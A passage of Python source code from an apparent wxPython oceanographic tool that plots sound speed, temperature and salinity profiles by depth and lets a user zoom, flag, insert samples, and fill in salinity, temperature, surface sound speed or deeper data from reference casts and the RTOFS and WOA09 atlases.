if self.prj.surface_sound_speed:
self.p.min_speed = min(self.p.min_speed, self.prj.surface_sound_speed)
self.p.max_speed = max(self.p.max_speed, self.prj.surface_sound_speed)
if self.p.display_woa and self.prj.ssp_woa:
self.p.min_depth = max(self.p.min_depth,
max(self.prj.ssp_woa.data[Dicts.idx['depth'], :]))
self.p.max_depth = min(self.p.max_depth,
min(self.prj.ssp_woa.data[Dicts.idx['depth'], :]))
self.p.min_speed = min(self.p.min_speed,
min(self.prj.ssp_woa.data[Dicts.idx['speed'], :]))
self.p.max_speed = max(self.p.max_speed,
max(self.prj.ssp_woa.data[Dicts.idx['speed'], :]))
self.p.min_temp = min(self.p.min_temp,
min(self.prj.ssp_woa.data[Dicts.idx['temperature'], :]))
self.p.max_temp = max(self.p.max_temp,
max(self.prj.ssp_woa.data[Dicts.idx['temperature'], :]))
self.p.min_sal = min(self.p.min_sal,
min(self.prj.ssp_woa.data[Dicts.idx['salinity'], :]))
self.p.max_sal = max(self.p.max_sal,
max(self.prj.ssp_woa.data[Dicts.idx['salinity'], :]))
if self.prj.ssp_woa_min and self.prj.ssp_woa_max:
if self.prj.ssp_woa_min.data.shape[1] > 0:
self.p.min_depth = max(self.p.min_depth,
max(self.prj.ssp_woa_min.data[Dicts.idx['depth'], :]))
self.p.max_depth = min(self.p.max_depth,
min(self.prj.ssp_woa_min.data[Dicts.idx['depth'], :]))
self.p.min_speed = min(self.p.min_speed,
min(self.prj.ssp_woa_min.data[Dicts.idx['speed'], :]))
self.p.max_speed = max(self.p.max_speed,
max(self.prj.ssp_woa_min.data[Dicts.idx['speed'], :]))
self.p.min_temp = min(self.p.min_temp,
min(self.prj.ssp_woa_min.data[Dicts.idx['temperature'],
:]))
self.p.max_temp = max(self.p.max_temp,
max(self.prj.ssp_woa_min.data[Dicts.idx['temperature'],
:]))
self.p.min_sal = min(self.p.min_sal,
min(self.prj.ssp_woa_min.data[Dicts.idx['salinity'], :]))
self.p.max_sal = max(self.p.max_sal,
max(self.prj.ssp_woa_min.data[Dicts.idx['salinity'], :]))
if self.prj.ssp_woa_max.data.shape[1] > 0:
self.p.min_depth = max(self.p.min_depth,
max(self.prj.ssp_woa_max.data[Dicts.idx['depth'], :]))
self.p.max_depth = min(self.p.max_depth,
min(self.prj.ssp_woa_max.data[Dicts.idx['depth'], :]))
self.p.min_speed = min(self.p.min_speed,
min(self.prj.ssp_woa_max.data[Dicts.idx['speed'], :]))
self.p.max_speed = max(self.p.max_speed,
max(self.prj.ssp_woa_max.data[Dicts.idx['speed'], :]))
self.p.min_temp = min(self.p.min_temp,
min(self.prj.ssp_woa_max.data[Dicts.idx['temperature'],
:]))
self.p.max_temp = max(self.p.max_temp,
max(self.prj.ssp_woa_max.data[Dicts.idx['temperature'],
:]))
self.p.min_sal = min(self.p.min_sal,
min(self.prj.ssp_woa_max.data[Dicts.idx['salinity'], :]))
self.p.max_sal = max(self.p.max_sal,
max(self.prj.ssp_woa_max.data[Dicts.idx['salinity'], :]))
if self.p.display_reference and self.prj.ssp_reference:
self.p.min_depth = max(self.p.min_depth,
max(self.prj.ssp_reference.data[Dicts.idx['depth'], :]))
self.p.max_depth = min(self.p.max_depth,
min(self.prj.ssp_reference.data[Dicts.idx['depth'], :]))
self.p.min_speed = min(self.p.min_speed,
min(self.prj.ssp_reference.data[Dicts.idx['speed'], :]))
self.p.max_speed = max(self.p.max_speed,
max(self.prj.ssp_reference.data[Dicts.idx['speed'], :]))
self.p.min_temp = min(self.p.min_temp,
min(self.prj.ssp_reference.data[Dicts.idx['temperature'], :]))
self.p.max_temp = max(self.p.max_temp,
max(self.prj.ssp_reference.data[Dicts.idx['temperature'], :]))
self.p.min_sal = min(self.p.min_sal,
min(self.prj.ssp_reference.data[Dicts.idx['salinity'], :]))
self.p.max_sal = max(self.p.max_sal,
max(self.prj.ssp_reference.data[Dicts.idx['salinity'], :]))
if self.p.sel_mode == self.p.sel_modes["Insert"]:
if self.prj.u.user_depth:
self.p.min_depth = max(self.p.min_depth, self.prj.u.user_depth)
self.p.max_depth = min(self.p.max_depth, self.prj.u.user_depth)
if self.prj.u.user_speed:
self.p.min_speed = min(self.p.min_speed, self.prj.u.user_speed)
self.p.max_speed = max(self.p.max_speed, self.prj.u.user_speed)
if self.prj.u.user_temperature:
self.p.min_temp = min(self.p.min_temp, self.prj.u.user_temperature)
self.p.max_temp = max(self.p.max_temp, self.prj.u.user_temperature)
if self.prj.u.user_salinity:
self.p.min_sal = min(self.p.min_sal, self.prj.u.user_salinity)
self.p.max_sal = max(self.p.max_sal, self.prj.u.user_salinity)
view_range = self.p.max_depth - self.p.min_depth
if view_range == 0.0:
view_range = 5.0
# We let the depth scale be 25% larger to allow the user to extend
self.p.min_depth -= 0.25 * view_range
self.p.max_depth = -1
view_range = self.p.max_speed - self.p.min_speed
if view_range == 0.0:
view_range = 5.0
self.p.min_speed -= 0.05 * view_range
self.p.max_speed += 0.05 * view_range
view_range = self.p.max_temp - self.p.min_temp
if view_range == 0.0:
view_range = 5.0
self.p.min_temp -= 0.05 * view_range
self.p.max_temp += 0.05 * view_range
view_range = self.p.max_sal - self.p.min_sal
if view_range == 0.0:
view_range = 5.0
self.p.min_sal -= 0.05 * view_range
self.p.max_sal += 0.05 * view_range
# msg = "View limits:\n" \
# "- depth: %s -> %s\n" \
# "- speed: %s -> %s" % (self.p.min_depth, self.p.max_depth, self.p.min_speed, self.p.max_speed)
# log.info(msg)
# ####### Plot ######
def on_plot_zoom(self, evt):
self.prj.u.inspection_mode = Dicts.inspections_mode['Zoom'] # zoom mode
self.prj.u.clear_user_samples()
self.p.sel_mode = self.p.sel_modes["Zoom"]
self._update_plot()
log.info("inspection mode: zoom")
def on_plot_flag(self, evt):
self.prj.u.inspection_mode = Dicts.inspections_mode['Flag'] # flag data
self.prj.u.clear_user_samples()
self.p.sel_mode = self.p.sel_modes["Flag"]
self._update_plot()
log.info("flag interaction: active")
def on_plot_unflag(self, evt):
self.prj.u.inspection_mode = Dicts.inspections_mode['Unflag'] # unflag data
self.prj.u.clear_user_samples()
self.p.sel_mode = self.p.sel_modes["Flag"]
self._update_plot()
log.info("unflag interaction: active")
def on_plot_insert(self, evt):
self.prj.u.inspection_mode = Dicts.inspections_mode['Insert'] # insert data
self.prj.u.clear_user_samples()
self.p.sel_mode = self.p.sel_modes["Insert"]
self._update_plot()
log.info("insert interaction: active")
def _on_point_selected(self, evt):
if self.p.sel_mode != self.p.sel_modes["Insert"]:
return
log.info("point selection: %s, %s" % (evt.xdata, evt.ydata))
x, y = evt.xdata, evt.ydata
if evt.axes == self.p.speed_axes:
if self.prj.u.user_salinity and self.prj.u.user_temperature and self.prj.u.user_depth:
self.prj.u.user_speed = oceanography.soundspeed(self.prj.u.user_depth, self.prj.u.user_temperature,
self.prj.u.user_salinity, self.prj.ssp_data.latitude)
msg = "User manually inserted temperature %f and salinity %f at depth %f, calculated sound speed %f" \
% (self.prj.u.user_temperature, self.prj.u.user_salinity, self.prj.u.user_depth,
self.prj.u.user_speed)
else:
self.prj.u.user_speed = x
self.prj.u.user_depth = y
self.prj.u.user_temperature = None
self.prj.u.user_salinity = None
msg = "User manually inserted sound speed %f at depth %f" \
% (self.prj.u.user_speed, self.prj.u.user_depth)
self.prj.ssp_data.insert_sample(depth=self.prj.u.user_depth, speed=self.prj.u.user_speed,
temperature=self.prj.u.user_temperature, salinity=self.prj.u.user_salinity,
source=Dicts.source_types['User'])
log.info(msg)
self.prj.u.clear_user_samples()
elif evt.axes == self.p.temp_axes:
self.prj.u.user_temperature = x
self.prj.u.user_depth = y
elif evt.axes == self.p.sal_axes:
self.prj.u.user_salinity = x
self.prj.u.user_depth = y
self._update_plot()
def _on_area_selected(self, evt):
if (self.p.sel_mode != self.p.sel_modes["Flag"]) and (self.p.sel_mode != self.p.sel_modes["Zoom"]):
return
log.info("area selection: %s, %s / %s, %s"
% (evt.x1data, evt.y1data, evt.x2data, evt.y2data))
x1, y1 = evt.x1data, evt.y1data
x2, y2 = evt.x2data, evt.y2data
if self.p.sel_mode == self.p.sel_modes["Flag"]:
# Deal with case of user selecting points
if evt.axes == self.p.speed_axes:
self.prj.ssp_data.toggle_flag([y1, y2], [x1, x2], 'speed', self.prj.u.inspection_mode)
elif evt.axes == self.p.temp_axes:
self.prj.ssp_data.toggle_flag([y1, y2], [x1, x2], 'temperature', self.prj.u.inspection_mode)
elif evt.axes == self.p.sal_axes:
self.prj.ssp_data.toggle_flag([y1, y2], [x1, x2], 'salinity', self.prj.u.inspection_mode)
elif self.p.sel_mode == self.p.sel_modes["Zoom"]:
# Deal with case of zooming in
if evt.axes == self.p.speed_axes:
self.p.min_speed = x1
self.p.max_speed = x2
elif evt.axes == self.p.temp_axes:
self.p.min_temp = x1
self.p.max_temp = x2
elif evt.axes == self.p.sal_axes:
self.p.min_sal = x1
self.p.max_sal = x2
self.p.min_depth = y1
self.p.max_depth = y2
self.p.has_zoom_applied = True
# In all cases, we update the plots accordingly
self._update_plot()
def _update_plot(self):
"""Update the plots"""
# log.info("updating plots")
if self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
if self.state == self.gui_state["CLOSED"]:
self._update_state(self.gui_state["OPEN"])
self._reset_view_limits()
try:
self._update_plot_worker()
except PyDeadObjectError:
log.info("dead object")
except IndexError:
log.info("index error during plot updating")
except KeyError:
log.info("key error during plot updating")
except ValueError:
log.info("value error during plot updating")
except AttributeError:
log.info("attribute error during plot updating")
except RuntimeError:
log.info("runtime error during plot updating")
def _update_plot_worker(self):
"""Update the plots"""
self.p.plots.get_figure().clf()
if not self.prj.has_ssp_loaded:
self.p.plots.draw()
return
if self.prj.server.is_running:
bg_color = '#32cd32' # green
elif self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
bg_color = '#F23047' # red
else:
bg_color = 'w'
# Fresh axes every time
self.p.speed_axes = self.p.plots.get_figure().add_subplot(131, axisbg=bg_color)
self.p.speed_axes.invert_yaxis()
self.p.temp_axes = self.p.plots.get_figure().add_subplot(132, sharey=self.p.speed_axes, axisbg=bg_color)
self.p.temp_axes.invert_yaxis()
self.p.sal_axes = self.p.plots.get_figure().add_subplot(133, sharey=self.p.speed_axes, axisbg=bg_color)
self.p.sal_axes.invert_yaxis()
if self.prj.has_ssp_loaded and self.p.display_woa and self.prj.ssp_woa:
# Plot WOA2009 profile for context if desired, but only if we have a current SV loaded
self.p.speed_axes.plot(self.prj.ssp_woa.data[Dicts.idx['speed'], :],
self.prj.ssp_woa.data[Dicts.idx['depth'], :], 'm--')
self.p.speed_axes.hold(True)
self.p.temp_axes.plot(self.prj.ssp_woa.data[Dicts.idx['temperature'], :],
self.prj.ssp_woa.data[Dicts.idx['depth'], :], 'm--')
self.p.temp_axes.hold(True)
self.p.sal_axes.plot(self.prj.ssp_woa.data[Dicts.idx['salinity'], :],
self.prj.ssp_woa.data[Dicts.idx['depth'], :], 'm--')
self.p.sal_axes.hold(True)
if self.prj.ssp_woa_max and self.prj.ssp_woa_min:
self.p.speed_axes.plot(self.prj.ssp_woa_min.data[Dicts.idx['speed'], :],
self.prj.ssp_woa_min.data[Dicts.idx['depth'], :], 'm--')
self.p.temp_axes.plot(self.prj.ssp_woa_min.data[Dicts.idx['temperature'], :],
self.prj.ssp_woa_min.data[Dicts.idx['depth'], :], 'm--')
self.p.sal_axes.plot(self.prj.ssp_woa_min.data[Dicts.idx['salinity'], :],
self.prj.ssp_woa_min.data[Dicts.idx['depth'], :], 'm--')
self.p.speed_axes.plot(self.prj.ssp_woa_max.data[Dicts.idx['speed'], :],
self.prj.ssp_woa_max.data[Dicts.idx['depth'], :], 'm--')
self.p.temp_axes.plot(self.prj.ssp_woa_max.data[Dicts.idx['temperature'], :],
self.prj.ssp_woa_max.data[Dicts.idx['depth'], :], 'm--')
self.p.sal_axes.plot(self.prj.ssp_woa_max.data[Dicts.idx['salinity'], :],
self.prj.ssp_woa_max.data[Dicts.idx['depth'], :], 'm--')
if self.p.display_reference and self.prj.ssp_reference:
# Plot Reference profile
good_pts = (self.prj.ssp_reference.data[Dicts.idx['flag'], :] == 0)
self.p.speed_axes.plot(self.prj.ssp_reference.data[Dicts.idx['speed'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts], 'y')
if self.prj.has_ssp_loaded:
self.p.speed_axes.plot(self.prj.ssp_reference.data[Dicts.idx['speed'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts],
'y', linewidth=3.0)
self.p.speed_axes.hold(True)
self.p.temp_axes.plot(self.prj.ssp_reference.data[Dicts.idx['temperature'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts], 'y')
if self.prj.has_ssp_loaded:
self.p.temp_axes.plot(self.prj.ssp_reference.data[Dicts.idx['temperature'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts],
'y', linewidth=3.0)
self.p.temp_axes.hold(True)
self.p.sal_axes.plot(self.prj.ssp_reference.data[Dicts.idx['salinity'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts], 'y')
if self.prj.has_ssp_loaded:
self.p.sal_axes.plot(self.prj.ssp_reference.data[Dicts.idx['salinity'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts],
'y', linewidth=3.0)
self.p.sal_axes.hold(True)
if self.prj.ssp_data.sis_data is not None:
# Plot thinned SSP for sis
good_pts = (self.prj.ssp_data.sis_data[Dicts.idx['flag'], :] == 0)
self.p.speed_axes.plot(self.prj.ssp_data.sis_data[Dicts.idx['speed'], good_pts],
self.prj.ssp_data.sis_data[Dicts.idx['depth'], good_pts],
marker='o', markersize=2.5, markerfacecolor='#00FF00', fillstyle=u'full',
linestyle='-', color='#33FF33')
if self.prj.has_ssp_loaded and self.p.display_flagged:
# Plot rejected points if desired
bad_pts = (self.prj.ssp_data.data[Dicts.idx['flag'], :] == 1)
self.p.speed_axes.plot(self.prj.ssp_data.data[Dicts.idx['speed'], bad_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], bad_pts], 'r,')
self.p.speed_axes.hold(True)
self.p.temp_axes.plot(self.prj.ssp_data.data[Dicts.idx['temperature'], bad_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], bad_pts], 'r,')
self.p.temp_axes.hold(True)
self.p.sal_axes.plot(self.prj.ssp_data.data[Dicts.idx['salinity'], bad_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], bad_pts], 'r,')
self.p.sal_axes.hold(True)
# Now plot the good points
if self.prj.server.is_running:
line = 'k'
else:
line = 'b'
if self.prj.has_ssp_loaded:
good_pts = (self.prj.ssp_data.data[Dicts.idx['flag'], :] == 0)
self.p.speed_axes.plot(self.prj.ssp_data.data[Dicts.idx['speed'], good_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], good_pts], line)
self.p.temp_axes.plot(self.prj.ssp_data.data[Dicts.idx['temperature'], good_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], good_pts], line)
self.p.sal_axes.plot(self.prj.ssp_data.data[Dicts.idx['salinity'], good_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], good_pts], line)
# Label plots, etc
self.p.speed_axes.grid()
self.p.speed_axes.axis([self.p.min_speed, self.p.max_speed, self.p.min_depth, self.p.max_depth])
self.p.speed_axes.set_xlabel('Sound Speed [m/s]')
self.p.speed_axes.set_ylabel('Depth [m]')
self.p.temp_axes.grid()
self.p.temp_axes.axis([self.p.min_temp, self.p.max_temp, self.p.min_depth,
self.p.max_depth])
self.p.temp_axes.set_xlabel('Temp [deg C]')
self.p.sal_axes.grid()
self.p.sal_axes.axis([self.p.min_sal, self.p.max_sal, self.p.min_depth,
self.p.max_depth])
self.p.sal_axes.set_xlabel('Sal [psu]')
if self.prj.server.is_running:
age_of_transmission = dt.datetime.utcnow() - self.prj.time_of_last_tx
self.p.temp_axes.set_title("SERVER: %d cast(s) delivered\nTime since last transmission: %s"
% (self.prj.server.delivered_casts,
':'.join(str(age_of_transmission).split(':')[:2])))
elif self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
self.p.temp_axes.set_title("Received %s... please process and deliver to SIS"
% (os.path.basename(self.prj.filename)))
else:
if self.prj.time_of_last_tx:
age_of_transmission = dt.datetime.utcnow() - self.prj.time_of_last_tx
self.p.temp_axes.set_title("%s\nTime since last transmission: %s" % (
os.path.basename(self.prj.filename), ':'.join(str(age_of_transmission).split(':')[:2])))
else:
self.p.temp_axes.set_title("%s" % os.path.basename(self.prj.filename))
# plot the current mean depth (if available and the user setting is on)
# print("# %s %s" % (self.prj.mean_depth, self.p.display_depth))
if self.prj.mean_depth and self.p.display_depth:
# draw line on the 3 plots
line = '#663300'
y = [self.prj.mean_depth, self.prj.mean_depth]
x = [-100.0, 2000] # sound speed
self.p.speed_axes.plot(x, y, line)
x = [-100.0, 100] # temperature
self.p.temp_axes.plot(x, y, line)
x = [-100.0, 100] # salinity
self.p.sal_axes.plot(x, y, line)
# draw rectangle on the 3 plots
if self.prj.server.is_running:
a = 0.8
else:
a = 0.5
sel = matplotlib.patches.Rectangle((-100.0, self.prj.mean_depth), 2100, 12000, edgecolor='k',
facecolor='#996633', label='_nolegend_', alpha=a)
self.p.speed_axes.add_patch(sel)
sel = matplotlib.patches.Rectangle((-100.0, self.prj.mean_depth), 200, 12000, edgecolor='k',
facecolor='#996633', label='_nolegend_', alpha=a)
self.p.temp_axes.add_patch(sel)
sel = matplotlib.patches.Rectangle((-100.0, self.prj.mean_depth), 200, 12000, edgecolor='k',
facecolor='#996633', label='_nolegend_', alpha=a)
self.p.sal_axes.add_patch(sel)
# plot vessel draft and surface sound speed (if available) [only on the speed plot]
# print("@ %s %s" % (self.prj.vessel_draft, self.prj.surface_sound_speed))
if self.prj.vessel_draft and self.prj.surface_sound_speed:
line = 'g--'
# vertical line
x = [self.prj.surface_sound_speed, self.prj.surface_sound_speed]
y = [0.0, 12000]
self.p.speed_axes.plot(x, y, line)
# horizontal line
x = [-100.0, 2100]
y = [self.prj.vessel_draft, self.prj.vessel_draft]
self.p.speed_axes.plot(x, y, line)
# dot at the draft/surface sound speed intersection
self.p.speed_axes.plot(self.prj.surface_sound_speed, self.prj.vessel_draft, 'g+', mew=1.6, ms=6)
# plotting during point insertion
if self.p.sel_mode == self.p.sel_modes["Insert"]:
salinities = np.zeros(2)
temperatures = np.zeros(2)
depths = np.zeros(2)
depths[0] = self.prj.u.user_depth
pts = ((self.prj.ssp_data.data[Dicts.idx['flag'], :] == 0)
& (self.prj.ssp_data.data[Dicts.idx['depth'], :] < self.prj.u.user_depth))
if np.count_nonzero(pts) > 0:
depths[1] = self.prj.ssp_data.data[Dicts.idx['depth'], pts][-1]
temperatures[1] = self.prj.ssp_data.data[Dicts.idx['temperature'], pts][-1]
salinities[1] = self.prj.ssp_data.data[Dicts.idx['salinity'], pts][-1]
if self.prj.u.user_salinity:
salinities[0] = self.prj.u.user_salinity
self.p.sal_axes.plot(salinities, depths, "c--")
if self.prj.u.user_temperature:
temperatures[0] = self.prj.u.user_temperature
self.p.temp_axes.plot(temperatures, depths, "c--")
pts = ((self.prj.ssp_data.data[Dicts.idx['flag'], :] == 0)
& (self.prj.ssp_data.data[Dicts.idx['depth'], :] > self.prj.u.user_depth))
if np.count_nonzero(pts) > 0:
depths[1] = self.prj.ssp_data.data[Dicts.idx['depth'], pts][0]
temperatures[1] = self.prj.ssp_data.data[Dicts.idx['temperature'], pts][0]
salinities[1] = self.prj.ssp_data.data[Dicts.idx['salinity'], pts][0]
if self.prj.u.user_salinity:
salinities[0] = self.prj.u.user_salinity
self.p.sal_axes.plot(salinities, depths, "c--")
if self.prj.u.user_temperature:
temperatures[0] = self.prj.u.user_temperature
self.p.temp_axes.plot(temperatures, depths, "c--")
if self.prj.u.user_salinity:
self.p.sal_axes.plot(self.prj.u.user_salinity, self.prj.u.user_depth, "c.")
if self.prj.u.user_temperature:
self.p.temp_axes.plot(self.prj.u.user_temperature, self.prj.u.user_depth, "c.")
self.p.plots.draw()
# ###### Process #####
def on_process_load_salinity(self, evt):
"""XBT-specific function to add salinity values"""
if self.prj.ssp_data.sensor_type != Dicts.sensor_types["XBT"]:
            msg = 'This is an XBT-specific function!'
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_reference:
log.info("using reference cast to augment salinity")
self.prj.ssp_data.replace_samples(self.prj.ssp_reference, 'salinity')
salinity_source = 'user-specified reference file %s' % self.prj.ssp_reference_filename
else: # atlases
if self.prj.s.ssp_salinity_source == Dicts.salinity_sources["RTOFS"]:
# ext_type = Dicts.source_types['RtofsExtend']
salinity_source = "RTOFS"
if not self.prj.rtofs_atlas_loaded:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("RTOFS grids not loaded, reverting to WOA09")
# ext_type = Dicts.source_types['Woa09Extend']
salinity_source = "WOA09"
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
else:
try:
temp_sv = self.prj.rtofs_atlas.query(self.prj.ssp_data.latitude,
self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
self.prj.ssp_data.replace_samples(temp_sv, 'salinity')
except SspError:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("failure in RTOFS lookup, reverting to WOA09")
# ext_type = Dicts.source_types['Woa09Extend']
salinity_source = "WOA09"
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
elif self.prj.s.ssp_salinity_source == Dicts.salinity_sources["WOA09"]:
# ext_type = Dicts.source_types['Woa09Extend']
salinity_source = "WOA09"
if not self.prj.woa09_atlas_loaded:
msg = "Functionality disabled: failure in loading WOA09 atlas"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_woa is None:
msg = "Functionality disabled: failure in WOA2009 lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
# And then extend by WOA
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
else:
raise SspError("unsupported extension source: %s" % self.prj.s.ssp_extension_source)
# recalculate the sound speed now that the salinity values have been replaced
self.prj.ssp_data.calc_speed()
# add metadata to source info
self.prj.ssp_data.modify_source_info("salinity augmented from %s" % salinity_source)
self._update_plot()
msg = 'Salinity added to profile using source %s' % salinity_source
log.info(msg)
self.status_message = 'Salinity added from %s' % salinity_source
def on_process_load_temp_and_sal(self, evt):
"""XSV- and SVP- specific function"""
if (self.prj.ssp_data.sensor_type != Dicts.sensor_types["XSV"]) \
and (self.prj.ssp_data.sensor_type != Dicts.sensor_types["SVP"]):
msg = 'XSV- and SVP-specific function!'
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_reference:
log.info("using reference cast to augment salinity and temperature")
self.prj.ssp_data.replace_samples(self.prj.ssp_reference, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_reference, 'temperature')
temperature_salinity_source = 'user-specified reference file %s' % self.prj.ssp_reference_filename
else: # atlases
if self.prj.s.ssp_salinity_source == Dicts.salinity_sources["RTOFS"]:
# ext_type = Dicts.source_types['RtofsExtend']
temperature_salinity_source = "RTOFS"
if not self.prj.rtofs_atlas_loaded:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("RTOFS grids not loaded, reverting to WOA09")
# ext_type = Dicts.source_types['Woa09Extend']
temperature_salinity_source = "WOA09"
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
else:
try:
temp_sv = self.prj.rtofs_atlas.query(self.prj.ssp_data.latitude,
self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
self.prj.ssp_data.replace_samples(temp_sv, 'salinity')
self.prj.ssp_data.replace_samples(temp_sv, 'temperature')
except SspError:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("failure in RTOFS lookup, reverting to WOA09")
# ext_type = Dicts.source_types['Woa09Extend']
temperature_salinity_source = "WOA09"
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
elif self.prj.s.ssp_salinity_source == Dicts.salinity_sources["WOA09"]:
# ext_type = Dicts.source_types['Woa09Extend']
temperature_salinity_source = "WOA09"
if not self.prj.woa09_atlas_loaded:
msg = "Functionality disabled: failure in loading WOA09 atlas"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_woa is None:
msg = "Functionality disabled: failure in WOA2009 lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
# And then extend by WOA
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
else:
raise SspError("unsupported extension source: %s" % self.prj.s.ssp_extension_source)
# add metadata to source info
self.prj.ssp_data.modify_source_info("temperature/salinity augmented from %s" % temperature_salinity_source)
# We don't recalculate speed, of course. T/S is simply for absorption coefficient calculation
self._update_plot()
msg = 'Temperature/Salinity added to profile using source %s' % temperature_salinity_source
log.info(msg)
self.status_message = "Temperature/salinity added from %s" % temperature_salinity_source
def on_process_load_surface_ssp(self, evt):
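"""Insert the surface sound speed (from the SIS depth datagram, or manual entry) into the profile at the applied depth just below the transducer draft"""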
if self.prj.km_listener.xyz88:
surface_ssp = np.mean(self.prj.km_listener.xyz88.sound_speed)
surface_ssp_source = "depth datagram"
else:
dlg = wx.TextEntryDialog(None,
'No surface sound speed received on port 16103.\nPlease enter surface sound speed',
'Text Entry')
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return
# read the entered value before destroying the dialog
surface_ssp = float(dlg.GetValue())
dlg.Destroy()
surface_ssp_source = "manual entry"
if not self.prj.vessel_draft:
self.get_transducer_draft()
if not self.prj.vessel_draft:
return
# Insert the surface speed value into the profile at the vessel_draft
self.prj.surface_speed_applied = True
self.prj.ssp_applied_depth = 1.15 * self.prj.vessel_draft
self.prj.ssp_data.insert_sample(depth=self.prj.ssp_applied_depth, speed=surface_ssp,
temperature=None, salinity=None,
source=Dicts.source_types['SurfaceSensor'])
# And set all values shallower than the applied depth to the same speed
idx = self.prj.ssp_data.data[Dicts.idx['depth'], :] < self.prj.ssp_applied_depth
self.prj.ssp_data.data[Dicts.idx['speed'], idx] = surface_ssp
self.prj.ssp_data.modify_source_info('surface sound speed from %s' % surface_ssp_source)
self._update_plot()
msg = 'Surface sound speed %.2f added to profile for upper %.1f m (source: %s)' \
% (surface_ssp, self.prj.vessel_draft, surface_ssp_source)
log.info(msg)
self.status_message = "Added surface sound speed %.1f" % surface_ssp
def on_process_extend(self, evt):
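"""Extend the loaded profile in depth using the reference cast, if set, otherwise the RTOFS/WOA09 atlases"""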
if not self.prj.has_ssp_loaded:
log.info("no ssp to extend")
return
if self.prj.ssp_reference:
log.info("Extending with user-specified reference profile")
ext_type = Dicts.source_types['UserRefExtend']
self.prj.ssp_data.extend(self.prj.ssp_reference, ext_type)
else: # atlases
if self.prj.s.ssp_extension_source == Dicts.extension_sources["RTOFS"]:
ext_type = Dicts.source_types['RtofsExtend']
if not self.prj.rtofs_atlas_loaded:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("RTOFS grids not loaded, reverting to WOA09")
ext_type = Dicts.source_types['Woa09Extend']
self.prj.ssp_data.extend(self.prj.ssp_woa, ext_type)
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
else:
try:
temp_sv = self.prj.rtofs_atlas.query(self.prj.ssp_data.latitude,
self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
self.prj.ssp_data.extend(temp_sv, ext_type)
# now use the WOA09 since it usually goes deeper
self.prj.ssp_data.extend(self.prj.ssp_woa, Dicts.source_types['Woa09Extend'])
except SspError:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("failure in RTOFS lookup, reverting to WOA09")
ext_type = Dicts.source_types['Woa09Extend']
self.prj.ssp_data.extend(self.prj.ssp_woa, ext_type)
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
elif self.prj.s.ssp_extension_source == Dicts.extension_sources["WOA09"]:
ext_type = Dicts.source_types['Woa09Extend']
if not self.prj.woa09_atlas_loaded:
msg = "Functionality disabled: failure in loading WOA09 atlas"
